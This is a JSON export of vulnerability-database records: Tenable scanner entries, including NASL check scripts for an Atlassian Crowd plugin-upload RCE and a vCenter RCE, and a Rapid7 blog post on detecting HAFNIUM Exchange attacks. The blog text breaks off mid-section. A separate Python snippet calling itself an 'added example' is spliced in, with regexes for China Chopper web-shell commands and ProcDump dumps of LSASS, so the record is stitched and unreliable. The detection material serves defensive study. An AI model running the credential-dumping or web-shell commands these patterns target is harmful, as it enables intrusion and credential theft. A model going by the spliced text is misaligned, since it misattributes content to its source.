"href": "https://www.tenable.com/plugins/was/98656", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:21:03", "description": "According to its self-reported version number, the Atlassian Crowd application running on the remote host is 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 
3.3.x prior to 3.3.5 or 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution (RCE) vulnerability. An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-13T00:00:00", "type": "nessus", "title": "Atlassian Crowd 3.1.x < 3.1.6 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98659", "href": "https://www.tenable.com/plugins/was/98659", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-28T13:14:27", "description": "The version of Atlassian Crowd installed on the remote host is 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 or 
3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution (RCE) vulnerability. An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2019-05-28T00:00:00", "type": "nessus", "title": "Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11580"], "modified": "2022-01-25T00:00:00", "cpe": ["cpe:/a:atlassian:crowd"], "id": "CROWD_3_4_4.NASL", "href": "https://www.tenable.com/plugins/nessus/125477", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(125477);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/25\");\n\n script_cve_id(\"CVE-2019-11580\");\n script_xref(name:\"IAVA\", value:\"2020-A-0499\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Atlassian Crowd installed on the remote host is affected\nby an remote code execution (RCE) vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Atlassian Crowd installed on the remote host is 2.1.x prior\nto 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 \nor 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution\n(RCE) vulnerability. 
An unauthenticated, remote attacker can exploit this, by\nusing pdkinstall development plugin, to install arbitrary plugins, which permits\nremote code execution.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n # https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f66fbb1c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 3.0.5, 3.1.6, 3.2.8, 3.3.5, 3.4.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11580\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:crowd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"crowd_detect.nasl\", \"os_fingerprint.nasl\");\n script_require_keys(\"www/crowd\");\n script_require_ports(\"Services/www\", 8095);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\ninclude(\"vcf.inc\");\n\nport = get_http_port(default:8095);\n\napp = \"crowd\";\n\napp_info = vcf::get_app_info(app:app, port:port, webapp:TRUE);\n\nvcf::check_granularity(app_info:app_info, sig_segments:3);\n\nconstraints = [\n { \"min_version\" : \"2.1.0\", \"fixed_version\" : \"3.0.5\" },\n { \"min_version\" : \"3.1.0\", \"fixed_version\" : \"3.1.6\" },\n { \"min_version\" : \"3.2.0\", \"fixed_version\" : \"3.2.8\" },\n { \"min_version\" : \"3.3.0\", \"fixed_version\" : \"3.3.5\" },\n { \"min_version\" : \"3.4.0\", \"fixed_version\" : \"3.4.4\" }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:19:09", "description": "The version of Atlassian Crowd installed on the remote host is 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 or 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution (RCE) vulnerability. 
An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-07-22T00:00:00", "type": "nessus", "title": "Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580"], "modified": "2019-07-22T00:00:00", "cpe": ["cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*"], "id": "701078.PRM", "href": "https://www.tenable.com/plugins/nnm/701078", "sourceData": "Binary data 701078.prm", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T15:21:03", "description": "According to its self-reported version number, the Atlassian Crowd application running on the remote host is 2.1.x prior to 3.0.5, 3.1.x prior to 3.1.6, 3.2.x prior to 3.2.8, 3.3.x prior to 3.3.5 or 3.4.x prior to 3.4.4. It is, therefore, affected by a remote code execution (RCE) vulnerability. 
An unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code execution.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-08-13T00:00:00", "type": "nessus", "title": "Atlassian Crowd 2.1.x < 3.0.5 RCE Vulnerability", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:atlassian:crowd:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_98660", "href": "https://www.tenable.com/plugins/was/98660", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-03T15:23:44", "description": "The version of Atlassian Crowd installed on the remote host is affected by a remote code execution (RCE) vulnerability.\nAn unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary plugins, which permits remote code 
execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-16T00:00:00", "type": "nessus", "title": "Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE (direct check)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11580"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:atlassian:crowd"], "id": "CROWD_CVE-2019-11580.NASL", "href": "https://www.tenable.com/plugins/nessus/138553", "sourceData": "#TRUSTED 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\n#TRUST-RSA-SHA256 
ab8710d5ae60f23e24cb87038d7b1f5e38b91d715ee47f169afca1d4e7cc5ed1b79b3892bcdc3567bb329fd89bca5511ff3f5cc3c8d39aa4434daa75413a21dc6ed3b4915dc11af36719afa84e9790dc7a13d09276083aeffd40c083ff27138b2203465cbd803a38bbff99227b128c5e22355948193284ada4ea3be416a149ffa518ef65ce5c5c650c91ea35923a2e32976295f8c48b47f170b7077b8b2bd165828019780efdde467e7f0d2497a0a1b8fdd93eb547fdff4336b8f28c3762d4d3dcbb63e7b9f7c9567c2186bb1081d46b160353a9643ef71a11a5385fe5e5e15c99fa1d24bc2d052c7922143a7ba6d5cb50e90abd541ae53dda1b98a478376f99593c035631cb68369a78e88db84f0087dc1dc497440ab4dc8fb95644196c631b271af42cfaa1d1282c919adfb7ffca79a6e5748ac64ad6ab6d34c9c884a92e6aeeca2fb42d0a7d2e6ce8f599b9a23b70a77e0eb05855402ea482d003d99c11f3964337a77ca9e3b8a9317ab4642d00cec10aed585c8388c7693550247a1f786f36c7c43413e4dc4b1859b2c37aa46419104bbe009426ba1a900d37517988426eca246065261c87da67c98dbce44648049576dd0b32965f27e60e27e4daeea0c885c79540843b00f216641e28e7f185a66b452a12196da47b9abc9eaec5aed13a4ecd67f8495a87e44c389b51240b620d51f70ca7d02da4ed62de5519bc71a17d\n#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(138553);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-11580\");\n script_bugtraq_id(108637);\n script_xref(name:\"IAVA\", value:\"2020-A-0499-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0571\");\n\n script_name(english:\"Atlassian Crowd 2.1.x < 3.0.5 / 3.1.x < 3.1.6 / 3.2.x < 3.2.8 / 3.3.x < 3.3.5 / 3.4.x < 3.4.4 RCE (direct check)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Atlassian Crowd installed on the remote host is affected by a remote code execution (RCE) vulnerability.\");\n script_set_attribute(attribute:\"description\", 
value:\n\"The version of Atlassian Crowd installed on the remote host is affected by a remote code execution (RCE) vulnerability.\nAn unauthenticated, remote attacker can exploit this, by using pdkinstall development plugin, to install arbitrary\nplugins, which permits remote code execution.\");\n # https://confluence.atlassian.com/crowd/crowd-security-advisory-2019-05-22-970260700.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f66fbb1c\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.corben.io/atlassian-crowd-rce/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 3.0.5, 3.1.6, 3.2.8, 3.3.5, 3.4.4 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-11580\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/07/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:crowd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"crowd_detect.nasl\");\n script_require_keys(\"www/crowd\");\n script_require_ports(\"Services/www\", 8095);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('install_func.inc');\n\nappname = 'Atlassian Crowd';\napp_id = 'crowd';\n\n# Exit if app is not detected on the target\nget_install_count(app_name:app_id, exit_if_zero:TRUE);\n\nport = get_http_port(default:8095);\ninstall = get_single_install(app_name:app_id, webapp:TRUE, port:port);\n\nbase_path = install['path'];\nurl = '/admin/uploadplugin.action';\n\nres = http_send_recv3(\n method : 'POST',\n port : port,\n item : base_path + url,\n exit_on_fail : TRUE\n);\n\nif ('400' >< res[0] && ('Unable to install plugin' >< res[2] || 'All plugins could not be validated' >< res[2]))\n{\n security_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n generic : TRUE,\n request : make_list(http_last_sent_request()),\n output : res[0] + res[2]\n );\n}\nelse\n{\n audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, build_url(qs:install['path'], port:port));\n}\n\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-10T19:22:13", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. 
A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-01T00:00:00", "type": "nessus", "title": "VMWare vCenter Server 6.5 < 6.5 U3p / 6.7 < 6.7 U3n / 7.0 < 7.0 U2b Remote Code Execution", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985"], "modified": "2022-06-01T00:00:00", "cpe": ["cpe:2.3:a:vmware:vcenter_server:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_113244", "href": "https://www.tenable.com/plugins/was/113244", "sourceData": "No source data", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-07T15:09:27", "description": "The vSphere Client (HTML5) contains a remote code execution vulnerability in a vCenter Server plugin. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. 
This affects VMware vCenter Server (7.x before 7.0 U2b, 6.7 before 6.7 U3n, and 6.5 before 6.5 U3p) and VMware Cloud Foundation (4.x before 4.2.1 and 3.x before 3.10.2.1).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-03T00:00:00", "type": "nessus", "title": "VMware vCenter Server Virtual SAN Health Check plug-in RCE (CVE-2021-21985) (direct check)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21985"], "modified": "2023-02-06T00:00:00", "cpe": ["cpe:/a:vmware:vcenter_server"], "id": "VMWARE_VCENTER_CVE-2021-21985.NBIN", "href": "https://www.tenable.com/plugins/nessus/150163", "sourceData": "Binary data vmware_vcenter_cve-2021-21985.nbin", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-03-23T17:16:33", "description": "\n\nIn recent weeks, there has been quite a lot of reporting on the exploitation of the latest disclosed vulnerabilities in [Microsoft\u2019s Exchange Server](<https://aka.ms/ExchangeVulns>) by an attacker referred to as HAFNIUM. 
One of the major reasons these latest vulnerabilities are so dangerous and appealing to attackers is that they allow them to go directly from the public internet to executing processes as SYSTEM, the most privileged user, on the victim's system.\n\n> \u201cRunning as a low-privileged account is a good security practice because then a software bug can't be used by a malicious user to take over the whole system.\u201d \nSource: [Application Pool Identities](<https://docs.microsoft.com/en-us/iis/manage/configuring-security/application-pool-identities>)\n\nBecause this service runs with the highest level of permission by default, it should be hardened and receive additional levels of monitoring. This default configuration does not employ the [principle of least privilege](<https://en.wikipedia.org/wiki/Principle_of_least_privilege>) and is made even more dangerous as these web applications are created with the intent to be exposed to the public internet and not protected by other basic means like network access control lists. In addition to that, these vulnerable servers provide direct access to a great number of user hashes/passwords and email inbox contents of the entire organization. This is one of the most direct routes to what certain attackers are commonly after in a victim\u2019s environment.\n\nWhile the reporting on the number of exploited systems has raised alarms for some, events of this scale have been observed by many in the information security industry for many years. Attackers of many types are more frequently looking to exploit the network services provided by victims to the public internet. Often, these services are on various edge devices designed specifically to be placed and exposed to the public internet. This can lead to challenges, as these devices may be appliances, firewalls, or other devices that do not support running additional security-related software, such as endpoint detection and response. 
These devices also commonly fall outside of standard patch management systems. Rapid7 has observed an increased speed between when a vulnerability is disclosed, to the creation and adoption of a working exploit being used en masse, which gives victims little time to test and deploy fixes while adhering to change control process for systems providing mission-critical services.\n\nOver the past few years, Rapid7 has observed several different attackers looking to quickly and directly gain access to victim systems in order to collect passwords, perform cryptojacking, distribute ransomware, and/or exfiltrate data. The attackers will typically target email boxes of specific high-ranking members of organizations or employees researching topics sensitive to their interests. The simplest method these attackers use to gain a foothold are simple [password spraying](<https://attack.mitre.org/techniques/T1110/003/>) attacks against systems that are providing remote access services to the public internet via Remote Desktop Protocol. More advanced attackers have taken advantage of recent vulnerabilities in [Citrix Netscaler](<https://blog.rapid7.com/2020/01/17/active-exploitation-of-citrix-netscaler-cve-2019-19781-what-you-need-to-know/>), [Progress\u2019 Telerik](<https://www.telerik.com/support/kb/aspnet-ajax/details/allows-javascriptserializer-deserialization>), and [Pulse Secure\u2019s Pulse Connect Secure](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/>), to name a few.\n\nWhile the method of gaining a foothold in a victim\u2019s network can vary from these types of attacks on internet-accessible services to spear phishing, the way an attacker moves and acts can remain unchanged for many years. The reason for this is the methods used once inside a victim\u2019s systems rarely need to be changed, as they continue to be very effective for the attacker. 
The continued adoption of \u201cliving off the land\u201d techniques that use pre-existing utilities that come with the operating systems make antivirus or application control less likely to catch and thwart an attacker. Additionally, for the attackers, this frees up or reduces the need for technical resources to develop exploits and tool sets.\n\nBecause the way an attacker moves and acts can remain unchanged for so long, Rapid7\u2019s Threat Intelligence and Detection Engineering (TIDE) team continuously collaborates with our [Managed Detection and Response Security Operations Center](<https://www.rapid7.com/services/managed-services/managed-detection-and-response-services/>) and [Incident Response](<https://www.rapid7.com/services/security-consulting/incident-response-services/>) teams to develop and update our detections in [InsightIDR](<https://www.rapid7.com/products/insightidr/>)\u2019s [Attacker Behavior Analytics](<https://docs.rapid7.com/insightidr/aba-detections>) to ensure all customers have coverage for the latest tactics, techniques, and procedures employed by attackers. This allows our customers to receive alerting to attacker behavior regardless of exploitation of unknown vulnerabilities and allows them to securely advance. \n\nLast, it is extremely important to not immediately assume that only a single actor is exploiting these new vulnerabilities. Multiple groups or individuals may be exploiting the same vulnerabilities simultaneously, or even a single group may do it and have various different types of follow-on activity. Without conclusive proof, proclaiming they are related is speculative, at best.\n\n## HAFNIUM-related activity\n\nThrough the use of our existing detections, Rapid7 observed attacker behavior using a [China Chopper](<https://attack.mitre.org/software/S0020/>) web shell against nine distinct victims across various industry verticals such as manufacturing, healthcare, utility providers, and more. 
This attacker behavior shares significant overlap with the actor known as HAFNIUM and was observed in data collected by Rapid7\u2019s [Insight Agent](<https://docs.rapid7.com/insight-agent/>) from Feb. 27 through March 7 in 2021. It should be noted that the way the client used by the attacker to spawn processes through the China Chopper webshell has remained [virtually unchanged since at least 2013](<https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html>). These command line arguments are quite distinct and easy to find in logs containing command line arguments. This means detections developed against these patterns have the potential for an effective lifespan for the better part of a decade.\n\n_Source: _[_The Little Malware That Could: Detecting and Defeating the China Chopper Web Shell (p. 21)_](<https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-china-chopper.pdf>)\n\nRapid7 developed additional detections based on the review of this attacker behavior. We noticed that by default, IIS when configured for Microsoft Exchange\u2019s Outlook Web Access, it will have an environment variable and value set to the following:\n\n`APP_POOL_ID=MSExchangeOWAAppPool`\n\nWith this knowledge, the collection of this data through Insight Agent, and the ability to evaluate it with [InsightIDR\u2019s Attacker Behavior Analytics](<https://www.rapid7.com/products/insightidr/features/attacker-behavior-analytics/>), the TIDE team was able to write a detection that would match anytime any process was executed where the child or parent environment variable and value matched this. This allowed us to not only find the already known use of China Chopper, but also several other attackers exploiting this vulnerability using different techniques. 
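The environment-variable detection described above, together with the China Chopper command wrapper, the ProcDump-against-LSASS, comsvcs.dll MiniDump and net group /del patterns the post lists, reduced to a small Python pass over constructed process-creation events. This is an added example and not Rapid7's or InsightIDR's code: the event field names (image, cmdline, env, parent_env), the regexes and the exclusion of w3wp.exe itself are this example's assumptions; only the APP_POOL_ID value and the detection names are taken from the post.

```python
import re

# From the post: the environment variable IIS sets for the Exchange OWA app pool.
OWA_POOL_VAR, OWA_POOL_VALUE = "APP_POOL_ID", "MSExchangeOWAAppPool"

# The IIS worker process carries the marker legitimately; only its descendants
# are findings. Excluding it is this example's assumption, not the post's.
IIS_WORKER = "w3wp.exe"

OWA_SPAWN = "Suspicious Process - Process Spawned By Outlook Web Access"

# China Chopper's command wrapper as it appears in the post's command lines:
#   cmd /c cd /d <dir>&<command>&echo [S]&cd&echo [E]
# Some of the listed lines stop at "echo [S]", so the tail is optional.
CHINA_CHOPPER_RE = re.compile(
    r"^(?:\S*\\)?cmd(?:\.exe)?\s+/c\s+cd\s+/d\s+.+?&.+?&echo \[S\](?:&cd&echo \[E\])?\s*$",
    re.IGNORECASE,
)
# ProcDump writing a full (-ma) or mini (-mm) dump of lsass.exe.
PROCDUMP_LSASS_RE = re.compile(
    r"procdump(?:64)?(?:\.exe)?\b.*?\s-m[am]\s+lsass(?:\.exe)?\b", re.IGNORECASE
)
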